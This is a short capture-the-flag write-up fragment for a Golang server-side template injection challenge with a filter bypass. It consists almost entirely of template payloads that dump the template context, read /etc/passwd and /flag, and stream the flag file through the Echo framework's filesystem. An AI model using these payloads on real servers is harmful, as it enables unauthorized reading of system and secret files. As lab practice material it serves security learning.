easySSTI ( Web Exploitation )
Can you SSTI me? ( Golang SSTI, WAF bypass )
Last updated
Can you SSTI me? ( Golang SSTI, WAF bypass )
Last updated
{{.}}
{{.File "/etc/passwd"}}
{{.File "/flag"}}
{{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{ .Get "template" }}
{{ $x := .Echo.Filesystem.Open "/flag" }} {{ $x.Seek 1 0 }} {{ .Stream 200 "text/plain" $x }}
{{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{ .Get "template" }}
